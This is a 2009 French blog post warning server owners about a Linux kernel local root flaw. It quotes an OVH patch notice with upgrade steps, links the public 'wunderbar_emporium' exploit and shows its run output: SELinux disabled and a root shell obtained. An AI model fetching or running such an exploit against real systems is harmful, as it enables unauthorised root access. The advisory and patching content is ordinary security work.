Faille noyaux linux

Posté le 14 Août, 2009 dans linux, sécurité | 1 Commentaire

A vos mise à jour amis possesseurs de serveurs dédies.
Une faille a été découverte par des membre de l’équipe sécurité google:
http://archives.neohapsis.com/archives/fulldisclosure/2009-08/0174.html
Le script pour l’exploit

Octave a prévenu via mailing liste de la faille et propose une mise à jour avec noyaux patchés sur OVH:

Bonjour,
Un bug de sécurité a été trouvé sur certaines fonction du
kernel. Il y a aussi des exploits qui permettent d’avoir
l’accès root sur un serveur avec un simple shell. Dans le
cas de nos serveurs, si vous faites tourner l’IPv6 vous
êtes vulnerables et il faut mettre à jour le noyau de votre
serveur de toute urgence.

Si vous êtes en netboot, il suffit de rebooter le serveur.

Si vous êtes en noyau dur sur le serveur, il faut telecharger
le noyau sur notre ftp public
ftp://ftp.ovh.net/made-in-ovh/bzImage/
Les noyaux 2.6.27.10-grs 2.6.28.4-std ont été recompilés
avec le code source patché contre ce bug de securité.

Une fois mis à jour, vous devez vous retrouver en:
– version 6 pour 2.6.27.10 grs
– version 3 pour 2.6.28.4 std

Si vous êtes en IPv4, vous n’avez pas besoins de mettre à jour
le kernel, mais bon, si ça ne mange pas de pain …


Le script pour exploiter la faille est déjà dispo
http://grsecurity.net/~spender/wunderbar_emporium.tgz

Assez simple et efficace:)

./wunderbar_emporium.sh
dm-1: warning, user block quota exceeded.
[+] MAPPED ZERO PAGE!
[+] Resolved sel_read_enforce to 0xc01cbdbf
[+] got ring0!
[+] detected 2.6 style 8k stacks
sh: mplayer: command not found
[+] Disabled security of : SELinux
[+] Got root!
h-3.2# whoami
root

1 Commentaire

Recevoir les commentaires par email

  1. Franck dit :

    Avec une vidéo bien trash en prime, pire que la roulette russe ahah

Trackbacks

URL de trackback: http://www.billyboylindien.com/securite/faille-noyaux-linux.html/trackback/

Commenter

Note: La modération des commentaires est activée